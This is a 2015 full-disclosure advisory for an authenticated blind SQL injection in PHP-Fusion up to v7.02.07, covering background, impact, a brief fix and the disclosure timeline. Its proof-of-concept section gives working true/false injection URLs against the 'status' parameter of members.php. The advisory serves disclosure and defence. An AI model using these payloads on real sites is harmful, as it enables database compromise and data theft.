Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07

1. =============================================
2. MGC ALERT 2015-002
3. - Original release date: September 18, 2015
4. - Last revised: October 05, 2015
5. - Discovered by: Manuel García Cárdenas
6. - Severity: 7,1/10 (CVSS Base Score)
7. =============================================
8.  
9. I. VULNERABILITY
10. -------------------------
11. Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07
12.  
13. II. BACKGROUND
14. -------------------------
15. PHP-Fusion is a lightweight open source content management system (CMS)
16. written in PHP.
17.  
18. III. DESCRIPTION
19. -------------------------
20. This bug was found using the portal with authentication as administrator.
21. To exploit the vulnerability only is needed use the version 1.0 of the HTTP
22. protocol to interact with the application. It is possible to inject SQL
23. code in the variable "status" on the page "members.php".
24.  
25. IV. PROOF OF CONCEPT
26. -------------------------
27. The following URL's and parameters have been confirmed to all suffer from
28. Blind SQL injection.
29.  
30. /phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0
31.  
32. Exploiting with true request (with mysql5):
33.  
34. /phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0'
35. AND substr(@@version,1,1)='5
36.  
37. Exploiting with false request:
38.  
39. /phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0'
40. AND substr(@@version,1,1)='4
41.  
42. V. BUSINESS IMPACT
43. -------------------------
44. Public defacement, confidential data leakage, and database server
45. compromise can result from these attacks. Client systems can also be
46. targeted, and complete compromise of these client systems is also possible.
47.  
48. VI. SYSTEMS AFFECTED
49. -------------------------
50. PHP-Fusion <= v7.02.07
51.  
52. VII. SOLUTION
53. -------------------------
54. All data received by the application and can be modified by the user,
55. before making any kind of transaction with them must be validated.
56.  
57. VIII. REFERENCES
58. -------------------------
59. https://www.php-fusion.co.uk/
60.  
61. IX. CREDITS
62. -------------------------
63. This vulnerability has been discovered and reported
64. by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
65.  
66. X. REVISION HISTORY
67. -------------------------
68. September 18, 2015 1: Initial release
69. October 10, 2015 2: Revision to send to lists
70.  
71. XI. DISCLOSURE TIMELINE
72. -------------------------
73. September 18, 2015 1: Vulnerability acquired by Manuel Garcia Cardenas
74. September 18, 2015 2: Send to vendor
75. September 24, 2015 3: Second mail to the verdor without response
76. October 10, 2015 4: Send to the Full-Disclosure lists
77.  
78. XII. LEGAL NOTICES
79. -------------------------
80. The information contained within this advisory is supplied "as-is" with no
81. warranties or guarantees of fitness of use or otherwise.
82.  
83. XIII. ABOUT
84. -------------------------
85. Manuel Garcia Cardenas
86. Pentester